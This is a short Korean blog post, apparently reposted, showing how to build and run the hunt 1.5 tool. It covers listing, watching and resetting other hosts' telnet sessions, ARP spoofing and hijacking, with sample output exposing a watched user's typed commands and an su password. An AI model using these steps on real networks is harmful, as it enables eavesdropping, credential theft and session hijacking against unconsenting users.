스니핑 툴 중에 하나인 hunt를 사용.
hunt는 동일 네트워크 상에 있는 모든 세션을 확인할수 있다. (default로 telnet과 rlogin)
구하는 건 알아서.....
# tar zxvf hunt-1.5.tgz
# cd hunt1.5
# make
# ./hunt
실행을 하게 되면 아래와 같은 화면이 나오게 된다.
메뉴를 보게 되면
l/w/r) list/watch/reset connections // 리스트를 보여주는 l , 보기모드인 w , 확인한 커넥션을 강제로 끈어 버리는 r
u) host up tests // host가 up 되어 있는 확인 test
a) arp/simple hijack (avoids ack storm if arp used) // arp spoofing
s) simple hijack /// 말그대로 하이젝킹
d) daemons rst/arp/sniff/mac
o) options
x) exit
hunt를 telnet이나 rlogin으로 접속 되어있고 통신을 하고 있다면 리스트에 뜨게 된다.
/*
* hunt 1.5
* multipurpose connection intruder / sniffer for Linux
* (c) 1998-2000 by kra
*/
starting hunt
--- Main Menu --- rcvpkt 0, free/alloc 64/64 ------
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
-> l
no connections are available
--- Main Menu --- rcvpkt 24, free/alloc 63/64 ------
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
*> l ///// 리스트를 보자.
0) 192.168.11.1 [2311] --> 192.168.11.100 [23]
1) 192.168.11.1 [2000] --> 192.168.11.131 [23]
--- Main Menu --- rcvpkt 58, free/alloc 63/64 ------
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
-> w ///////// watch 모드로 보자.
0) 192.168.11.1 [2311] --> 192.168.11.100 [23]
1) 192.168.11.1 [2000] --> 192.168.11.131 [23]
choose conn> 0
dump [s]rc/[d]st/[b]oth [b]> b
print src/dst same characters y/n [n]> y
CTRL-C to break
ffddssaa
-bash: fdsa: command not found
[youngrap@localhost youngrap]$ ddffssaa
-bash: dfsa: command not found
[youngrap@localhost youngrap]$ ffddss
-bash: fds: command not found
[youngrap@localhost youngrap]$ ssuu
Password: fdsafdsa
su: incorrect password
[youngrap@localhost youngrap]$
-펌-
No comments:
Post a Comment